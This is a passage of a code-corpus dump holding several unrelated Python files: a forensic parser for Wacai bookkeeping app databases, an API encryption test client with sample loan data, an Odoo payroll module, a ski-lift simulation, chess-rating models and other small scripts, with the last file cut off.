\"type\" in data:\n bill_type = data[\"type\"] # COST PRE\n if bill_type == \"COST\":\n bill_record.bookType = 1\n elif bill_type == \"PRE\":\n bill_record.bookType = 2\n if \"tip\" in data:\n tip = data[\"tip\"]\n bill_record.tip = tip\n if \"remark\" in data:\n remark = data[\"remark\"]\n bill_record.remark = remark\n except Exception as e:\n TraceService.Trace(TraceLevel.Info,\"{0}\".format(e))\n if bill_record.bookId:\n self.wacai.db_insert_table_record(bill_record)\n except Exception as e:\n TraceService.Trace(TraceLevel.Error,\"{0}\".format(e))\n self.wacai.db_commit()\n\n '''\n 这个表没有id根据匹配,根据名称匹配怕会造成数据混淆,先取消\n def get_group_monthly_bill(self, node):\n db_node = node.GetByPath(\"grouptally.db\")\n if db_node is None:\n return\n db = SQLiteParser.Database.FromNode(db_node)\n if \"TBL_GROUP_SPENT\" in db.Tables:\n return\n tbs = SQLiteParser.TableSignature(\"TBL_GROUP_SPENT\")\n for rec in db.ReadTableRecords(tbs, self.extract_deleted, True):\n try:\n if canceller.IsCancellationRequested:\n return\n month = self._get_table_record_value(rec, \"month\")\n \n except Exception as e:\n TraceService.Trace(TraceLevel.Error,\"{0}\".format(e))\n '''\n def get_family_tally(self, node):\n fa_node = node.GetByPath(\"MultiPeopleTally.db\")\n if fa_node is None:\n return\n db = SQLiteParser.Database.FromNode(fa_node)\n if \"TBL_BOOK\" not in db.Tables:\n return\n tbs = SQLiteParser.TableSignature(\"TBL_BOOK\")\n for rec in db.ReadTableRecords(tbs, self.extract_deleted, True):\n try:\n if canceller.IsCancellationRequested:\n return\n tally = model_wacai.Tally()\n tally.source = fa_node.AbsolutePath\n if rec.Deleted == DeletedState.Deleted:\n rec.deleted = 1\n fid = self._get_table_record_value(rec, \"id\")\n tally.bookId = str(fid)\n tally.tallyType = 1\n data = self._get_table_record_value(rec, \"data\")\n if data:\n try:\n json_tally = json.loads(data)\n if \"createdTime\" in json_tally:\n create_time = json_tally[\"createdTime\"]\n tally.createTime = create_time\n if \"updatedTime\" in json_tally:\n update_time = json_tally[\"updatedTime\"]\n tally.updatedTime = update_time\n if \"name\" in json_tally:\n t_name = json_tally[\"name\"]\n tally.name = t_name\n if \"memberCount\" in json_tally:\n m_count = json_tally[\"memberCount\"]\n tally.memberCount = m_count\n if \"currencyFlag\" in json_tally:\n money_flag = json_tally[\"currencyFlag\"]\n tally.moneyFlag = money_flag\n except Exception as e:\n TraceService.Trace(TraceLevel.Info,\"{0}\".format(e))\n continue\n if tally.bookId:\n self.wacai.db_insert_table_tally(tally)\n except Exception as e:\n TraceService.Trace(TraceLevel.Error,\"{0}\".format(e))\n self.wacai.db_commit()\n\n def get_family_member(self, node):\n bill_node = node.GetByPath(\"MultiPeopleTallyRN.db\")\n if bill_node is None:\n return\n db = SQLiteParser.Database.FromNode(bill_node)\n if \"TBL_MEMBER\" not in db.Tables:\n return\n tbs = SQLiteParser.TableSignature(\"TBL_MEMBER\")\n for rec in db.ReadTableRecords(tbs, self.extract_deleted, True):\n try:\n if canceller.IsCancellationRequested:\n return\n member = model_wacai.Member()\n member.source = bill_node.AbsolutePath\n if rec.Deleted == DeletedState.Deleted:\n member.deleted = 1\n bookid = self._get_table_record_value(rec, \"bookid\")\n member.bookId = str(bookid)\n mtype = self._get_table_record_value(rec, \"type\") # 成员类型 1 家庭公共 0 普通\n member.memberType = mtype\n isdelete = self._get_table_record_value(rec, \"isdelete\") # 0 未删除 1 删除\n data = self._get_table_record_value(rec, \"data\")\n if data:\n try:\n m_id = b_id = None\n json_member = json.loads(data)\n if \"id\" in json_member:\n m_id = json_member[\"id\"]\n member.memberId = m_id\n if \"bookId\" in json_member:\n b_id = json_member[\"bookId\"]\n if \"name\" in json_member:\n name = json_member[\"name\"]\n member.name = name\n if \"mobile\" in json_member:\n photo = json_member[\"mobile\"]\n member.phone = photo\n if \"avatar\" in json_member:\n avatar = json_member[\"avatar\"]\n member.avatar = avatar\n if \"createdTime\" in json_member:\n create_time = json_member[\"createdTime\"]\n member.createTime = create_time\n if \"updatedTime\" in json_member:\n update_time = json_member[\"updatedTime\"]\n member.updatedTime = update_time\n except Exception as e:\n TraceService.Trace(TraceLevel.Info,\"{0}\".format(e))\n continue\n if member.bookId and member.memberId:\n self.wacai.db_insert_table_member(member)\n except Exception as e:\n TraceService.Trace(TraceLevel.Error,\"{0}\".format(e))\n self.wacai.db_commit()\n\n def get_family_bill(self, node):\n bill_node = node.GetByPath(\"MultiPeopleTallyRN.db\")\n if bill_node is None:\n return\n db = SQLiteParser.Database.FromNode(bill_node)\n if \"TBL_BILL\" not in db.Tables:\n return\n tbs = SQLiteParser.TableSignature(\"TBL_BILL\")\n for rec in db.ReadTableRecords(tbs, self.extract_deleted, True):\n try:\n if canceller.IsCancellationRequested:\n return\n bill_record = model_wacai.BillRecord()\n bill_record.source = bill_node.AbsolutePath\n if rec.Deleted == DeletedState.Deleted:\n bill_record.deleted = 1\n bookid = self._get_table_record_value(rec, \"bookid\")\n bill_record.bookId = str(bookid)\n mid = self._get_table_record_value(rec, \"mid\") # 成员类型 1 家庭公共 0 普通\n billtime = self._get_table_record_value(rec, \"billtime\") # 0 未删除 1 删除\n bill_record.createTime = billtime\n data = self._get_table_record_value(rec, \"data\")\n if data:\n try:\n record = json.loads(data)\n if \"comment\" in record:\n comment = record[\"comment\"]\n bill_record.remark = comment\n if \"createTime\" in record:\n create_time = record[\"createTime\"]\n bill_record.createTime = create_time\n if \"updatedTime\" in record:\n update_time = record[\"updatedTime\"]\n bill_record.updatedTime = update_time\n if \"latitude\" in record and \"longitude\" in record:\n lng = record[\"longitude\"]\n lat = record[\"latitude\"]\n if lng and lat:\n bill_record.langitude = lng\n bill_record.latitude = lat\n if \"amount\" in record:\n amount = float(record[\"amount\"])\n bill_record.amount = amount\n if \"recType\" in record:\n rectype = record[\"recType\"] # 1 支出 2 收入\n if rectype == 1:\n bill_record.bookType = 1\n elif rectype == 2:\n bill_record.bookType = 2\n if \"attachments\" in record:\n if record[\"attachments\"]:\n attach = record[\"attachments\"]\n try:\n attach_data = json.loads(attach)\n urls = []\n for res in attach_data:\n if \"addr\" in res:\n urls.append(res[\"addr\"])\n if len(urls) != 0:\n bill_record.mediaPath = ','.join(str(u) for u in urls)\n except:\n pass\n if \"members\" in record:\n if record[\"members\"]:\n mids = []\n for item in record[\"members\"]:\n try:\n if \"memberId\" in item:\n mids.append(item[\"memberId\"])\n except:\n pass\n if len(mids) != 0:\n bill_record.memberId = ','.join(str(u) for u in mids)\n except Exception as e:\n TraceService.Trace(TraceLevel.Info,\"{0}\".format(e))\n continue\n if bill_record.bookId and bill_record.amount:\n self.wacai.db_insert_table_record(bill_record)\n except Exception as e:\n TraceService.Trace(TraceLevel.Error,\"{0}\".format(e))\n self.wacai.db_commit()\n\n def get_family_monthly_bill(self, node):\n bill_node = node.GetByPath(\"MultiPeopleTallyRN.db\")\n if bill_node is None:\n return\n db = SQLiteParser.Database.FromNode(bill_node)\n if \"TBL_TOTAL\" not in db.Tables:\n return\n tbs = SQLiteParser.TableSignature(\"TBL_TOTAL\")\n for rec in db.ReadTableRecords(tbs, self.extract_deleted, True):\n try:\n if canceller.IsCancellationRequested:\n return\n monthbill = model_wacai.MonthBill()\n monthbill.source = bill_node.AbsolutePath\n if rec.Deleted == DeletedState.Deleted:\n monthbill.deleted = 1\n bill_type = self._get_table_record_value(rec, \"type\")\n monthbill.bookType = bill_type\n book_id = self._get_table_record_value(rec, \"bookid\")\n monthbill.bookId = book_id\n book_time = self._get_table_record_value(rec, \"time\")\n monthbill.createTime = book_time\n data = self._get_table_record_value(rec, \"data\")\n if data:\n try:\n month_data = json.loads(data)\n if \"monthIncome\" in month_data:\n income = month_data[\"monthIncome\"]\n monthbill.income = self._get_actual_amount(income)\n if \"monthOutgo\" in month_data:\n outgo = month_data[\"monthOutgo\"]\n monthbill.outgo = self._get_actual_amount(outgo)\n if \"monthBalance\" in month_data:\n balance = month_data[\"monthBalance\"]\n monthbill.balance = self._get_actual_amount(balance)\n except:\n pass\n if monthbill.bookId and monthbill.createTime:\n self.wacai.db_insert_table_bill(monthbill)\n except Exception as e:\n TraceService.Trace(TraceLevel.Error,\"{0}\".format(e))\n pass\n self.wacai.db_commit()\n\n def _get_table_record_value(self, rec, column):\n if column in rec and (not rec[column].IsDBNull):\n return rec[column].Value\n else:\n return None\n\n def _get_actual_amount(self, amount):\n try:\n if amount is not None:\n return float(amount) / 100\n except Exception as e:\n TraceService.Trace(TraceLevel.Error, \"{0}\".format(e))\n return 0\n\n\ndef analyze_wacaitally(node, extract_deleted, extract_source):\n pr = ParserResults()\n results = WaCaiTally(node, extract_deleted, extract_source).parse()\n if results:\n pr.Models.AddRange(results)\n pr.Build(\"挖财记账理财\")\n return pr\n\n\ndef execute(node, extract_deleted):\n return analyze_wacaitally(node, extract_deleted, False)\n","sub_path":"apple_wacaitally.py","file_name":"apple_wacaitally.py","file_ext":"py","file_size_in_byte":21119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"631147181","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport sys\nimport codecs\n\n\ndef main():\n args = []\n filedata = codecs.open(\"./data3.csv\",\"r\",\"utf-8\")\n try:\n for l in filedata:\n l = l.strip()\n args.append(l)\n finally:\n filedata.close()\n boxname = args.pop(0).split(\",\")\n boxname.pop(0)\n gradeint = len(args)\n detail = []\n for item in args:\n list1 = item.split(\",\")\n list1.pop(0)\n detail += list1\n\n boxa = makeBox(0,detail,gradeint)\n boxb = makeBox(1,detail,gradeint)\n boxc = makeBox(2,detail,gradeint)\n\n parselist = [prize(boxa),prize(boxb),prize(boxc)]\n\n prizedic =dict(zip(boxname,parselist))\n \n ichirobox = \"\"\n for k, v in prizedic.items():\n if v == max(prizedic.values()):\n ichirobox = k\n print(\"問題1\",ichirobox,round(100*max(prizedic.values())))\n print(\"問題2\",round(100*(1/gradeint)*(sum(prizedic.values()))))\n print(\"問題3\",round(100*(parselist[0]/sum(prizedic.values()))))\n\ndef makeBox(boxnum,detail,gradeint):\n box = []\n while boxnum < int(len(detail)):\n box.append(detail[boxnum])\n boxnum += gradeint\n return box\n\ndef prize(detail):\n allnum = 0\n for item in detail:\n allnum += int(item)\n parse = int(detail[0]) / allnum \n return parse\n\nif __name__ ==\"__main__\":\n main()\n","sub_path":"kondo/kadai6/kadai6_3.py","file_name":"kadai6_3.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"271294097","text":"#coding:utf-8\nimport json\nimport requests\nfrom urllib import parse\n\n#---------数据加密解密----------\nclass DataCovertHandler(object):\n def __init__(self,url):\n self.url = url\n self.encrypt_headers = {\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n self.encrypt_api = url+\"/api/test\" # http://10.0.7.24:4444/api/test\n\n self.decryption_header = {\n \"Content-Type\": \"application/json\"\n }\n self.decryption_api =url+ \"/api/test/1\"\n\n def get_encrypt_data(self,*args,**kwargs):\n\n self.data = parse.urlencode(kwargs['kwargs'] )\n self.res = requests.post(url=self.encrypt_api,data=self.data,headers=self.encrypt_headers)\n # print(self.encrypt_api)\n return self.res.text\n\n def get_decryption_data(self,*args,**kwargs):\n self.data = kwargs['kwargs'].text.encode(encoding=\"utf-8\")\n # self.url = self.url+self.decryption_api\n # print(self.decryption_api)\n # print(self.data)\n self.res = requests.post(url=self.decryption_api,data=self.data,headers=self.decryption_header)\n return self.res.text\n\n\nif __name__ == '__main__':\n data = {\n \"appId\": \"10000\",\n \"merchantId\": \"10000\",\n \"subMerchantId\": \"10000\",\n \"openId\": \"\",\n \"flowNo\": \"20190321172841\",\n \"encoding\": \"UTF-8\",\n \"reqDateTime\": \"2019-03-21 23:59:59\",\n \"reqServiceId\": \"api.mucfc.uloan.creditApply\",\n \"bizContent\": {\n \"applyNo\": \"001\",\n \"custNo\": \"0003\",\n \"custName\": \"王秋了\",\n \"idNo\": \"110101199003074450\",\n \"mobileNo\": \"13624517834\",\n \"certValidDate\": \"\",\n \"address\": \"\",\n \"nation\": \"\",\n \"workCompany\": \"\",\n \"workCity\": \"\",\n \"workAddr\": \"\",\n \"residentCity\": \"\",\n \"residentAddr\": \"\",\n \"bioCompareRs\": \"\",\n \"suggestLimit\": \"200000.00\",\n \"applyTime\": \"2019-03-28\"\n }\n }\n\n\n headers = {\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n get_date = DataCovertHandler(\"http://10.0.7.24:4444\")\n # print(data)\n result = get_date.get_encrypt_data(kwargs=data)\n # print(result)\n\n #请求接口\n url_test = 'http://10.0.7.24:4444/api/Action'\n\n res = requests.post(url=url_test, data=result, headers=headers)\n print(res.text.encode(encoding=\"utf-8\"))\n get_decryp_date = get_date.get_decryption_data(kwargs=res)\n print(get_decryp_date)\n\n","sub_path":"ZhaoLianInterfaceTest/base/DataConvert.py","file_name":"DataConvert.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"355383057","text":"# -*- coding: utf-8 -*-\n#Python Imports\nfrom datetime import date, datetime, time\nfrom dateutil.relativedelta import relativedelta\n#Odoo Imports\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError, ValidationError\n\nclass VclsEntity(models.Model):\n _inherit = 'res.company'\n\n \"\"\" We just add a short name to the company object in order to use it in files naming conventions \"\"\"\n short_name = fields.Char(\n string = 'Short Name',)\n\n \"\"\" We override the field to allow a translation of the string\"\"\"\n phone = fields.Char(related='partner_id.phone', string=_(\"Phone\"), store=True, readonly=False)\n vat = fields.Char(related='partner_id.vat', string=_(\"VAT\"), readonly=False)\n siret = fields.Char(related='partner_id.siret', string=_(\"ID\"), readonly=False)\n capital = fields.Text(string=_(\"Capital\"), readonly=False, translate=True)\n\n @api.multi\n def _get_vcls_template_report_data(self):\n return {\n '_t': _,\n }\n\nclass LeaveType(models.Model):\n _inherit = 'hr.leave.type'\n \n \"\"\" We add a field to capture in which payroll export column a specific type is related to.\"\"\"\n \n payroll_type = fields.Selection([\n ('rtt', 'RTT'),\n ('cp_paid', 'CP Paid'),\n ('cp_unpaid', 'CP Unpaid'),\n ('sick', 'Sick'),\n ('other_paid','Other Paid'),\n ])\n \nclass Leave(models.Model):\n _inherit = 'hr.leave'\n \n \"\"\" We add fields to support the payroll export and have a comfortable splitting of leave if required\"\"\"\n \n trunc_start = fields.Date(\n string = 'Truncated Start',\n readonly = True,\n )\n \n trunc_end = fields.Date(\n string = 'Truncated End',\n readonly = True,\n )\n \n trunc_duration = fields.Float(\n string = 'Truncated Duration',\n readonly = True,\n )\n \n export_string = fields.Char(\n readonly = True,\n )\n \n\nclass Employee(models.Model):\n _inherit = 'hr.employee'\n \n @api.multi\n def get_leaves_distribution(self,date_start,date_end):\n \"\"\" Returns a dictionary summarizing how days in leave are distributed over the given period. \n total: the number of days in the given period,\n off: according to the resource calendar, the number of days off\n bank: number of bank holidays (i.e global leaves)\n leave: days part of user-related leaves\n weekend : saturday or sunday\n \n Called from the payroll line calculation with \n \"\"\"\n for employee in self:\n #init constants\n total = 0\n off = 0\n bank = 0\n leave = 0\n weekend = 0\n \n wt = employee.resource_calendar_id\n \n start_ord = date_start.toordinal()\n end_ord = date_end.toordinal()\n \n for d_ord in range(start_ord,end_ord+1): #1 is added to ensure the last day of the range to be taken in account\n \n d = date.fromordinal(d_ord)\n wd = d.weekday()\n \n if wd > 4 : #if saturday or sunday\n weekend += 1\n continue\n \n # we look at global leaves\n noon = datetime.combine(d, time(12, 0, 0))\n if wt.global_leave_ids.filtered(lambda r: r.date_fromnoon):\n bank += 1\n continue\n \n #the remaining days are considered as leave if the day is present in the working time.\n #if not (i.e. attendances is empty), then the employee is considered off\n attendances = len(wt.attendance_ids.filtered(lambda r: r.dayofweek == str(wd)))\n \n leave += attendances*0.5 #half a day per attendance\n off += 1-(attendances*0.5)\n \n \n \n \n return {\n 'total': (date_end-date_start).days + 1,\n 'weekend': weekend,\n 'bank': bank,\n 'off': off,\n 'leave': leave,\n }\n ","sub_path":"vcls-interfaces/models/payroll_overriden_classes.py","file_name":"payroll_overriden_classes.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"406639859","text":"\n##############################################################################\n#\n# Copyright (c) 2003-2018 by The University of Queensland\n# http://www.uq.edu.au\n#\n# Primary Business: Queensland, Australia\n# Licensed under the Apache License, version 2.0\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Development until 2012 by Earth Systems Science Computational Center (ESSCC)\n# Development 2012-2013 by School of Earth Sciences\n# Development from 2014 by Centre for Geoscience Computing (GeoComp)\n#\n##############################################################################\n\nfrom __future__ import print_function, division\n\n__copyright__=\"\"\"Copyright (c) 2003-2018 by The University of Queensland\nhttp://www.uq.edu.au\nPrimary Business: Queensland, Australia\"\"\"\n__license__=\"\"\"Licensed under the Apache License, version 2.0\nhttp://www.apache.org/licenses/LICENSE-2.0\"\"\"\n__url__=\"https://launchpad.net/escript-finley\"\n\nfrom esys.escript import *\nfrom esys.pycad import *\nfrom esys.pycad.gmsh import Design\nfrom esys.finley import MakeDomain\n\n\np0=Point(0.,0.)\np1=Point(1.,0.)\np2=Point(1.,1.)\np3=Point(0.,1.)\n\nl01=Line(p0,p1)\nl12=Line(p1,p2)\nl23=Line(p2,p3)\nl30=Line(p3,p0)\n\ns=PlaneSurface(CurveLoop(l01,l12,l23,l30))\ndes=Design(dim=2, order=1, element_size = 1, keep_files=True)\ndes.setMeshFileName(\"rec.geo\")\ndes.addItems(s)\n\ndom=MakeDomain(des)\ndom.write(\"rec.fly\")\n","sub_path":"finley/test/python/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"224392861","text":"import webbrowser\n\nclass Movie():\n\t\"\"\" This class provides a way to store movie data. \"\"\"\n\tVALID_RATINGS = [\"G\", \"PG\", \"PG-13\", \"R\"]\n\n\tdef __init__(self, title, story, poster, trailer, quote):\n\t\tself.title = title\n\t\tself.storyline = story\n\t\tself.poster_image_url = poster\n\t\tself.trailer_youtube_url = trailer\n\t\tself.quote = quote\n\n\tdef show_trailer(self):\n\t\t\"\"\" Opens a youtube video at the link provided in trailer_youtube_url. \"\"\"\n\t\twebbrowser.open(self.trailer_youtube_url)\n\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"651268210","text":"__author__ = 'tombnorwood'\n\nfrom datetime import timedelta\nfrom django.utils import timezone\n\nfrom django.core.urlresolvers import reverse\n\nfrom maui.utils import url_with_querystring\n\n\ndef round_time_up(raw_time, minute_increment):\n rounded_minute = next((minute for minute in range(0, 61, minute_increment) if minute >= raw_time.minute), 60)\n rounded_time = raw_time + timedelta(minutes=rounded_minute-raw_time.minute)\n return rounded_time\n\n\ndef round_time_down(raw_time, minute_increment):\n max_rounded_minute = ((60/minute_increment) - 1) * minute_increment\n rounded_minute = next((minute for minute in range(max_rounded_minute, -1, -1*minute_increment) if minute <= raw_time.minute), 0)\n rounded_time = raw_time - timedelta(minutes=raw_time.minute-rounded_minute)\n return rounded_time\n\n\ndef build_rounded_time_list(start_time, end_time, increment):\n list_start_time = round_time_down(start_time, increment)\n list_end_time = round_time_up(end_time, increment)\n increment_delta = timedelta(minutes=increment)\n rounded_time_list = []\n current_time = list_start_time\n while current_time <= list_end_time:\n rounded_time_list.append(current_time)\n current_time += increment_delta\n return rounded_time_list\n\n\ndef expected_inventory_url_with_querystring(product, facility, start_time, end_time):\n # convert inventory search times from timezone aware to naive datetetimes for url-ification purposes\n inventory_search_start_time_naive = start_time.replace(tzinfo=None)\n inventory_search_end_time_naive = end_time.replace(tzinfo=None)\n return url_with_querystring(reverse(\"expected_inventory\"),\n product=product.id,\n facility=facility.id,\n start_time=inventory_search_start_time_naive,\n end_time=inventory_search_end_time_naive,\n increment=30)","sub_path":"inventory/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"418775102","text":"#!/usr/bin/env python\r\n\r\nimport os, code\r\nimport pickle as pickle\r\nfrom djeval import *\r\nimport numpy as np\r\nfrom pandas import DataFrame, Series, read_pickle, concat, cut, qcut\r\nfrom sklearn.ensemble import GradientBoostingRegressor\r\nfrom sklearn.externals import joblib\r\n\r\ndef sample_df(df, n_to_sample):\r\n if n_to_sample >= len(df.index.values):\r\n return df\r\n row_indexes = np.random.choice(df.index.values, n_to_sample, replace=False)\r\n return df.ix[row_indexes]\r\n\r\ndef shell():\r\n vars = globals()\r\n vars.update(locals())\r\n shell = code.InteractiveConsole(vars)\r\n shell.interact()\r\n\r\nmsg('loading chunklikes')\r\nblundermodel_dir = sys.argv[1]\r\nthing = joblib.load(blundermodel_dir + 'groups.p')\r\nelo_bins = thing[0]\r\nchunk_bounds = thing[1]\r\nfeatures = thing[2]\r\n\r\nprint('elo_bins is %s' % str(elo_bins))\r\nprint('chunk_bounds is %s' % str(chunk_bounds))\r\n\r\n# chunkmodels[elo_name, chunk_bound] = a model fit on a certain ELO\r\n# range that predicts, for a move, given that the error was < than the\r\n# previous chunk bounds, the chance that the error will be >= this\r\n# chunk bound.\r\nchunkmodels = {}\r\n\r\nnum_models = (len(elo_bins) - 1) * len(chunk_bounds)\r\nelo_names = set()\r\nmsg('Loading the %i models' % num_models)\r\nfor modelnum in range(0,num_models):\r\n thing = joblib.load('%s%i.p' % (blundermodel_dir, modelnum))\r\n elo_name = thing[0]\r\n elo_names.add(elo_name)\r\n chunk_bound = thing[1]\r\n model = thing[2]\r\n chunkmodels[elo_name, chunk_bound] = model\r\n\r\nmsg('reading movedata')\r\nmoves_df = read_pickle('/data/movedata.p')\r\nmoves_df['clipped_movergain'] = moves_df['movergain'].clip(-1e9,0)\r\nfit_df = moves_df[moves_df['bestmove_piece'] != False]\r\n\r\ntesting = False\r\nif testing:\r\n games_to_load = 10\r\n games = np.random.choice(np.arange(1,25001), games_to_load, replace=False)\r\n fit_df = fit_df[fit_df['gamenum'].isin(games)]\r\n\r\ndiagnose = False\r\nif diagnose:\r\n fit_df = sample_df(fit_df, 30)\r\n\r\nlike_colnames = []\r\nX = fit_df[features]\r\n\r\n# given a single row of sequential conditional likelihoods,\r\n# return the likelihood for the actual move that was made\r\ndef gain_likelihood(row):\r\n mg = row['movergain']\r\n prob = 1.0\r\n for ix, cb in enumerate(chunk_bounds):\r\n if mg >= cb:\r\n return prob * row.iloc[ix]\r\n else:\r\n prob = prob * (1 - row.iloc[ix])\r\n return prob\r\n \r\n\r\nfor elo_name in list(elo_names):\r\n allchunks = []\r\n for cb in chunk_bounds:\r\n model = chunkmodels[elo_name, cb]\r\n newcol_name = 'cb_' + str(elo_name.translate(None, ' ()[],')) + '_' + str(cb)\r\n like_colnames.append(newcol_name)\r\n msg('Predicting %s' % newcol_name)\r\n preds = model.predict_proba(X)\r\n preds_series = DataFrame(preds).iloc[:,1]\r\n preds_series.index = X.index\r\n preds_series.name = cb\r\n allchunks.append(preds_series)\r\n \r\n allchunks.append(fit_df['movergain'])\r\n allchunks_df = concat(allchunks, axis=1)\r\n fit_df[elo_name] = allchunks_df.apply(gain_likelihood, axis=1)\r\n\r\nif diagnose:\r\n cols_to_show = list(elo_names)\r\n cols_to_show.extend(['gamenum','side','halfply','elo','movergain'])\r\n print(fit_df[cols_to_show].transpose())\r\n\r\n# group by player-game, and combine all the likelihoods into a single\r\n# likelihood for that ELO\r\n\r\ndef exp_sum_log(foo):\r\n return np.exp(sum(np.log(foo)))\r\n\r\n# for each player-game, for each ELO range, compute product of likelihoods for all moves \r\n# in that game. \r\nchunkgroups = fit_df.groupby(['gamenum', 'side', 'elo'])\r\nch_aggs = []\r\n# exp(sum(log(likelihoods))) is just a cute way to do\r\n# product(likelihoods) which is *maybe* more numerically friendly\r\nfor elo_name in elo_names:\r\n ch_aggs.append( chunkgroups[elo_name].agg({elo_name: lambda x: np.exp(sum(np.log(x)))}) )\r\nch_agg_df = concat(ch_aggs, axis=1)\r\n\r\n# add up the likelihoods across all ELO ranges, add it as a new column\r\nch_agg_df = concat([ch_agg_df, ch_agg_df[list(elo_names)].sum(axis=1)], axis=1)\r\nch_agg_df.columns.values[-1] = 'sumlike'\r\n\r\n# change the per-ELO-range column to be divided by the sum of likelihoods.\r\n# now it is the probability for that ELO range\r\nfor elo_name in elo_names:\r\n ch_agg_df[elo_name] = ch_agg_df[elo_name] / ch_agg_df['sumlike']\r\nch_agg_df.drop('sumlike', axis=1, inplace=True)\r\n\r\nif testing:\r\n print(ch_agg_df)\r\n\r\njoblib.dump(ch_agg_df, '/data/chunk_aggs.p')\r\n","sub_path":"data/external/repositories_2to3/137656/blundercheck-master/combine/contest_20150323a/modeling/compute_chunklikes.py","file_name":"compute_chunklikes.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"100557114","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 1 17:31:41 2020\n\n@author: Dvyd\n\"\"\"\n\nimport simpy\nimport numpy as np\nimport random\nimport settings\nfrom esquiador import esquiador\nfrom esquiador_agrupat import esquiador_agrupat\nfrom grup_esquiador_setup import grup_esquiador_setup as gsetup\n\nclass source(object):\n def __init__(self, env):\n self.env = env\n self.action = env.process(self.run())\n \n def source(env, num, telecadira, remuntador1, remuntador2, pista1, pista2, pista3, pista4):\n count_ind = 1\n count_grup = 1\n while(1):\n if (random.randint(1,10) == 1):\n env.process(gsetup.grup_esquiador_setup(env, count_grup, telecadira, remuntador1, remuntador2, pista1, pista2, pista3, pista4))\n count_grup += 1\n else:\n env.process(esquiador.esquiador(env, '%d' % settings.count,telecadira, remuntador1, remuntador2, pista1, pista2, pista3, pista4))\n settings.count += 1\n \n settings.remunt1_cua.append(len(remuntador1.queue))\n settings.remunt2_cua.append(len(remuntador2.queue))\n \n settings.telecadira_cua.append(len(telecadira.queue))\n \n settings.pista1_cua.append(len(pista1.queue))\n settings.pista2_cua.append(len(pista2.queue))\n settings.pista3_cua.append(len(pista3.queue))\n settings.pista4_cua.append(len(pista4.queue))\n yield env.timeout(settings.fdistribution_arribades())\n","sub_path":"source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"186406030","text":"from PIL import Image\nimport numpy as np\nimport KNN\nN = 32\n\n\n\ntraining_matrix = np.load('train_data.npy')\ntraining_data_labels = np.load('labels.npy')\n\nfor n in range(10):\n img = Image.open('C:\\\\Users\\\\Akatsuki\\\\Pictures\\\\Screenshots\\\\%d.jpg' % n) # get the picture\n img = np.array(img) # translate the pic to array\n img = img[:,:,0] # get the two dim array\n img = np.where(img==255,0,1) # modify the data in the array: 255->1, else->0\n # np.savetxt('/home/akatsuki/图片/test3.txt',img,fmt='%d') # save the 32*32 matrix\n img = KNN.cut_picture(img)\n img = KNN.strech_picture(img).reshape(N*N)\n res = KNN.classify(img, training_matrix, training_data_labels, 3)\n print('The %d predicted result is: %d' % (n,res))\n","sub_path":"DigitRecognition/hw_predict.py","file_name":"hw_predict.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"33580122","text":"from os import listdir\nimport csv\n\nmypath = 'T:courses/MSiA400/jobs/job_descriptions'\nfiles = [f for f in listdir(mypath) if f[-12:] == '_expired.csv']\nfout = open('out.csv','w')\nw = csv.writer(fout)\n\nw.writerow(['GUID','DateExpired'])\n\nfor i in files:\n with open(i) as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for row in reader:\n w.writerow(row)\n\nfout.close()\n\n\n","sub_path":"zobrist_descriptive/code/csv2db.py","file_name":"csv2db.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"593114273","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# @Filename: step13_calculate_car_value\n# @Date: 31/1/2018\n# @Author: Mark Wang\n# @Email: wangyouan@gamil.com\n\nimport os\nimport multiprocessing\nimport datetime\n\nimport pandas as pd\nimport numpy as np\nimport statsmodels.api as sm\nimport pathos\n\nfrom constant import Constant as const\n\nff_4_factor_df = pd.read_pickle(os.path.join(const.DATA_PATH, '20180201_ff_factor_path.pkl'))\ntrading_day_series = pd.read_pickle(os.path.join(const.DATA_PATH, '20180204_business_day_list.pkl'))\n\n\ndef car(df, event_date, factor_number, period_start_days, period_end_days):\n \"\"\"\n To calculate the cumulative abnormal return.\n Input stock ticker, event date, factor number, and test interval.\n Factor number must be 1, 3 or 4. The default value of test interval is set to 5.\n @:param stock_symbol could be cusip or stock ticker\n\n if calculate CAR, period_start_days should be -2 and period_end_days should be 2\n if calculate RUN up, period_start_days should be -210 and period_end_days should be -11\n \"\"\"\n if factor_number not in {1, 3, 4}:\n # print('Factor number must be 1, 3, 4')\n return np.nan, 'Invalid factor number'\n\n if period_start_days > period_end_days:\n return np.nan, 'Invalid period days'\n\n useful_col = ['Mkt-RF', 'SMB', 'HML', 'Mom'][:factor_number]\n ff_factor_df = ff_4_factor_df[useful_col]\n\n data = 